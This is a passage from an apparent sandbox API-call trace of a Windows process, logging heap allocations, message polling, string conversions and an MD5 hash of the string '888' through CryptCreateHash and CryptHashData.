RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0209.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0209.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0209.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0209.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0209.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0209.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0209.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0209.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0209.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0209.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0209.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0209.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0209.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0209.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0209.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0209.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0209.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0209.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0209.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0209.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0209.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0209.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0209.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0209.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0209.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0209.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0209.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0209.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0209.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0209.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0209.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0209.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0209.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0209.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0209.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0209.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0209.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0209.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0209.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0209.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0209.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0209.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0209.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0209.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0209.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0209.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0209.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0209.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0209.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0209.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0209.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0209.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0209.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0209.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0209.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0209.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0209.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0209.513] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0209.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0209.514] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e50b30, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0209.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0209.514] GetProcAddress (hModule=0x756e0000, lpProcName="CryptCreateHash") returned 0x756feed0 [0209.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0209.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0209.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0209.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0209.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0209.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0209.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0209.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0209.515] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0209.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0209.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0209.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0209.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0209.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0209.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0209.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0209.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0209.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0209.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0209.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0209.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0209.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0209.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0209.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0209.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0209.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0209.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0209.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0209.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0209.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0209.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0209.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0209.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0209.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0209.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0209.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0209.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0209.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0209.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0209.516] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.516] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.516] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.516] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.516] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0209.516] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54df8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0209.516] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0209.516] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.516] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0209.516] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54e28, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0209.516] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.517] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0209.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508a8 [0209.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0209.517] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0209.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0209.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0209.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0209.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0209.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0209.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0209.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0209.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0209.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0209.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0209.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0209.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0209.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0209.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0209.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0209.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0209.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0209.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0209.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0209.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9779f8 [0209.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0209.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0209.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0209.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0209.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0209.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0209.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0209.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0209.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0209.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0209.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0209.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699a8 [0209.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0209.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0209.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0209.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0209.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0209.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0209.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0209.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0209.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0209.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0209.518] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0209.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0209.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0209.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0209.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0209.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0209.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0209.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0209.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0209.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0209.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0209.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0209.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0209.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0209.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0209.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0209.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0209.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0209.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0209.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0209.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0209.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0209.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0209.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0209.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0209.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0209.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0209.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0209.520] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0209.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xe) returned 0x2e50a70 [0209.520] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e50a70, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0209.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0209.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0209.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0209.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0209.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0209.520] CryptHashData (hHash=0xa87250, pbData=0x2e54e78, dwDataLen=0x3, dwFlags=0x1) returned 1 [0209.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0209.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a48 [0209.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0209.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0209.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0209.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0209.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0209.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0209.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0209.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0209.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0209.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0209.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0209.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0209.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0209.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c08 [0209.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0209.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0209.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0209.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0209.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0209.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0209.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0209.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0209.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0209.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0209.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0209.521] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0209.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0209.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0209.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0209.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0209.521] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.522] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0209.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0209.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0209.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 